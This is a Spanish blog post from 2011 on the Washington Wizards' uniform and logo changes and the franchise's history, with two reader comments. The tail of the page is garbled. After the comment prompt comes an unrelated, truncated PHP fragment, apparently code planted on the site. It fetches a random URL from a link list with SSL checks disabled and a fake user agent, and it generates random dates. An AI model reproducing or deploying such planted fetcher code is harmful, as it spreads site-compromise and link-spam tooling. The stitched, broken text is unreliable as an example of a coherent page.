Nueva imagen para los “Young Wizards”

30 de September de 2011 por Faju

A mediados de mayo los Wizards presentaron los que iban a ser los nuevos uniformes para la temporada 2011-2012.

Para entender sus nuevos colores tenemos que remontarnos a 1963. Los Chicago Zephyrs llegan a Baltimore y cambian su apodo por el de Bullets (balas). Diez años después emigran a Landover, convirtiéndose en los Capital Bullets. Su estancia ahí dura solo un año y en 1974 se trasladan a la capital. Llegan los tiempos dorados de los Washington Bullets. De la mano de Elvis Hayes y Wes Unseld ganan su único anillo de campeones en 1978.

Diecinueve años más tarde deciden buscar un apodo menos bélico, organizando un concurso público para cambiar la identidad de la franquicia.Gana el nombre de Wizards.

Su nombre cambia, su imagen también. Del rojo, blanco y azul marino pasamos a un azul más claro, negro y marrón. En su ilustrativo logotipo aparece un Merlín con aspecto de bonachón. Juntamente con los Celtics, los Wizards son el único equipo que luce una figura humana como imagotipo.

Para el decimosegundo aniversario en la capital, el marrón deja paso al dorado, un toque mágico a la imagen que no se vería reflejado en su juego.

También en 2007 aparece uno de los alternate logos más extraños de la liga, un “dc” (iniciales de Distrio de Columbia) de trazo gestual que contrasta mucho con la tipografía utilizada en la marca principal.

En la temporada 2011-2012 (una vez más) los Wizards estrenarán imagen. Con intención de remarcar su estatus de equipo capitalino los colores corporativos de la franquicia vuelven a ser los de la bandera de Estados Unidos (y de rebote osa de la Republica Checa; léase Jan Vesely).

En las versiones alternativas aparecen monumentos icónicos de la ciudad, como el Washington Monument, silueta que se repite en las ascendentes de la “h” i la “d”. Aprovechando este cambio, las iníciales “DC”, homenajean a las dos “L” con manos de los Washington Bullets.

Los “Young Wizards” ven el futuro con ilusión después de años de sequía. Su nueva imagen está preparada. ¿Y ellos?


Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Comentario fricky del día: la mascota de los Celtics es un Leprechaun, o un duende. Así que técnicamente no es una figura humana. Y ya que nos ponemos los mismos wizards tampoco tienen origen humano según algunas leyendas.

    Por lo demás, el nombre Wizard me estomaga bastante. Bullets molaba demasiado con la parejita fav (Webber-Howard) aunque reconozco que en aquel momento ni el equipaje ni el logo molaban demasiado.
    Quitando eso, y sin disgustarme excesivamente el logo del mago, veo con buenos ojos básicamente todos los cambios, especialmente el logo y el equipaje local.

      Citar

  2. alejandro dice:
    #2

    ekipacion me gusta con su toque retro y este equipo esta en creciemiento y cuidado con la evolucion de sus jugadores jovenes que de aqui a uno años daran guerra en el este

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>